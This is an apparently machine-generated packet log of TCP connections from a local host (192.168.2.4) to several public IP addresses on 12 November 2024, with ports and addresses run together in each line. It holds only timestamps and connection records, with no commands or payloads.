                                  Nov 12, 2024 16:41:06.285024881 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.291990995 CET44349741104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.339663982 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.371680021 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.371695995 CET44349741104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.371803045 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.371826887 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.372956991 CET44349741104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.373027086 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.373054981 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.373068094 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.373109102 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.378348112 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.378438950 CET44349741104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.378479958 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.378590107 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.378678083 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.378684998 CET44349741104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.421612024 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.421613932 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.421633005 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.468318939 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:06.987767935 CET44349741104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.987859011 CET44349741104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:06.987903118 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:07.009279013 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:07.009300947 CET44349741104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:07.340872049 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:07.340922117 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:07.340984106 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:07.341526985 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:07.341537952 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:07.993052959 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:07.993352890 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:07.993366957 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:07.994404078 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:07.994524956 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.045757055 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.067297935 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.067298889 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.067308903 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.067379951 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.117809057 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.117816925 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.165584087 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.187536001 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:08.187570095 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:08.187721014 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:08.188361883 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:08.188373089 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:08.336885929 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.336911917 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.336920023 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.336949110 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.336977959 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.336994886 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.337027073 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.378925085 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.456648111 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.456657887 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.456707954 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.456737041 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.456792116 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.462254047 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.462263107 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.462306976 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.462327957 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.462372065 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.575362921 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.575371027 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.575457096 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.581434011 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.581440926 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.581515074 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.697539091 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.697549105 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.697613001 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.700520992 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.700527906 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.700592041 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.711478949 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:08.711523056 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:08.711668968 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:08.712037086 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:08.712052107 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:08.714056015 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:08.714099884 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:08.714258909 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:08.715533972 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:08.715544939 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:08.812608004 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.812623978 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.812697887 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.819346905 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.819355011 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.819407940 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.819417953 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.819463968 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:08.819627047 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.866796970 CET49744443192.168.2.4192.185.17.40
                                  Nov 12, 2024 16:41:08.866826057 CET44349744192.185.17.40192.168.2.4
                                  Nov 12, 2024 16:41:09.101654053 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:09.148344040 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:09.233305931 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:09.233330965 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:09.234646082 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:09.234755993 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:09.240390062 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:09.240466118 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:09.290991068 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:09.291004896 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:09.294276953 CET49750443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:09.294322968 CET44349750184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:09.294568062 CET49750443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:09.304080009 CET49750443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:09.304095030 CET44349750184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:09.338989973 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:09.399157047 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.399369001 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.399398088 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.400403023 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.400465965 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.423135996 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.423434019 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.423449039 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.424462080 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.424516916 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.696645021 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.696878910 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.697129011 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.697278023 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.699963093 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.699985027 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.700228930 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.700251102 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.743823051 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.743822098 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.873431921 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.873507977 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.873559952 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.881488085 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.881572962 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.881623030 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.928371906 CET49748443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.928405046 CET44349748185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:09.929496050 CET49747443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:09.929524899 CET44349747185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:10.005542040 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.005585909 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:10.005681992 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.005994081 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.006028891 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:10.006081104 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.006530046 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.006536961 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:10.007101059 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.007117033 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:10.150548935 CET44349750184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:10.150613070 CET49750443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:10.201400995 CET49750443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:10.201421976 CET44349750184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:10.201699972 CET44349750184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:10.250200987 CET49750443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:10.369935036 CET49750443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:10.415344000 CET44349750184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:10.611994028 CET44349750184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:10.612060070 CET44349750184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:10.612181902 CET49750443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:10.617367983 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:10.667783976 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.744287014 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.744307041 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:10.745456934 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:10.745528936 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.885492086 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.885618925 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:10.886100054 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.886121988 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:10.899851084 CET49750443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:10.899877071 CET44349750184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:10.931147099 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:10.971793890 CET49755443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:10.971838951 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:10.972059965 CET49755443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:10.972543955 CET49755443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:10.972560883 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:11.081208944 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.081265926 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.081317902 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.081336021 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.082007885 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.082026005 CET4434975134.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.082043886 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.082066059 CET49751443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.622622967 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.623058081 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.623073101 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.624068022 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.624128103 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.625121117 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.625178099 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.625643969 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.625649929 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.665770054 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.821178913 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:11.821248055 CET49755443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:11.822910070 CET49755443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:11.822917938 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:11.823151112 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:11.824142933 CET49755443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:11.828771114 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.829093933 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.829128981 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.829140902 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.829158068 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.829212904 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.829834938 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.829859972 CET4434975234.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:11.829915047 CET49752443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:11.837559938 CET49756443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:11.837584972 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:11.837703943 CET49756443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:11.837913990 CET49756443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:11.837927103 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:11.871332884 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:12.071886063 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:12.071929932 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:12.072191954 CET49755443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:12.072756052 CET49755443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:12.072778940 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:12.072792053 CET49755443192.168.2.4184.28.90.27
                                  Nov 12, 2024 16:41:12.072798967 CET44349755184.28.90.27192.168.2.4
                                  Nov 12, 2024 16:41:12.527746916 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:12.528265953 CET49756443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:12.528286934 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:12.528749943 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:12.532495975 CET49756443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:12.532582045 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:12.532640934 CET49756443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:12.579336882 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:12.587646961 CET49756443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:12.724136114 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:12.724200964 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:12.724808931 CET49756443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:12.725089073 CET49756443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:12.725101948 CET44349756185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:12.729087114 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:12.729120016 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:12.729249954 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:12.729520082 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:12.729536057 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.343276024 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.385919094 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.385934114 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.386928082 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.390355110 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.523060083 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.523135900 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.523412943 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.523422003 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.587616920 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.731853962 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.732060909 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.732088089 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.732114077 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.732121944 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.732160091 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.732166052 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.733365059 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.733413935 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.734350920 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.734361887 CET4434975734.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:13.734370947 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.734410048 CET49757443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:13.741216898 CET49758443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:13.741244078 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:13.741297007 CET49758443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:13.741673946 CET49758443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:13.741691113 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:14.435156107 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:14.435400963 CET49758443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:14.435415030 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:14.435739040 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:14.436196089 CET49758443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:14.436196089 CET49758443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:14.436213970 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:14.436270952 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:14.478286982 CET49758443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:14.618083000 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:14.618144035 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:14.618213892 CET49758443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:14.618711948 CET49758443192.168.2.4185.230.63.171
                                  Nov 12, 2024 16:41:14.618722916 CET44349758185.230.63.171192.168.2.4
                                  Nov 12, 2024 16:41:14.623044014 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:14.623076916 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:14.623245955 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:14.623508930 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:14.623521090 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.264239073 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.268486977 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:15.268507004 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.268872023 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.269567013 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:15.269567013 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:15.269584894 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.269625902 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.322244883 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:15.872023106 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.872160912 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.872198105 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:15.872200012 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.872211933 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.872243881 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:15.872869015 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:15.872900009 CET4434975934.149.87.45192.168.2.4
                                  Nov 12, 2024 16:41:15.872941017 CET49759443192.168.2.434.149.87.45
                                  Nov 12, 2024 16:41:19.097157001 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:19.097223043 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:19.097423077 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:20.339778900 CET49745443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:41:20.339833021 CET44349745172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:41:21.161899090 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:21.161964893 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:21.162127972 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:22.341881037 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:22.341916084 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:53.451503992 CET4972380192.168.2.4199.232.210.172
                                  Nov 12, 2024 16:41:53.451565981 CET4972480192.168.2.4199.232.210.172
                                  Nov 12, 2024 16:41:53.457381010 CET8049723199.232.210.172192.168.2.4
                                  Nov 12, 2024 16:41:53.457398891 CET8049724199.232.210.172192.168.2.4
                                  Nov 12, 2024 16:41:53.457431078 CET4972380192.168.2.4199.232.210.172
                                  Nov 12, 2024 16:41:53.457453012 CET4972480192.168.2.4199.232.210.172
                                  Nov 12, 2024 16:41:58.466377020 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:58.466407061 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:58.466465950 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:58.467243910 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:58.467257023 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.206882954 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.206984997 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.208323002 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.208328962 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.208528042 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.215209961 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.255338907 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.447650909 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.447671890 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.447686911 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.447773933 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.447783947 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.447834015 CET49763443192.168.2.413.107.246.45
